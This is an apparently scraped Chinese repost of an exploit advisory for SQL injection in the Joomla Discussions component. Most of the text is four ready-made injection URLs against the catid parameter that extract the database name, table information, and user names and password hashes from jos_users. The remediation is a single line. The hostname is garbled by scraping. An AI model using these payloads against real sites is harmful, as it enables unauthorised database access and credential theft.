好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Joomla讨论组件com_discussions SQL注射及修复 - 网站安

标题: Joomla Discussions Component (com_discussions) SQL Injection Vulnerability 作者: Red Security TEAM HdhCmsTest2cto测试数据 下载 地址: http://extensions.joomla.org/extensions/communication/forum/13560 测试平台: CentOS 测试示例: # http://HdhCmsTest2cto测试数据 /index.php?option=com_discussions&view=thread&catid=[SQLi] # 示例: # # 1. [Get Database Name] # http://HdhCmsTest2cto测试数据 /index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [Get  Tables  Name] # http://HdhCmsTest2cto测试数据 /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a # 3. [Get      Username] # http://HdhCmsTest2cto测试数据 /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # 4. [Get      Password] # http://HdhCmsTest2cto测试数据 /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # HdhCmsTest2cto测试数据提供修复方案:   过滤index.php页面的option参数输入

查看更多关于Joomla讨论组件com_discussions SQL注射及修复 - 网站安的详细内容...

  阅读:36次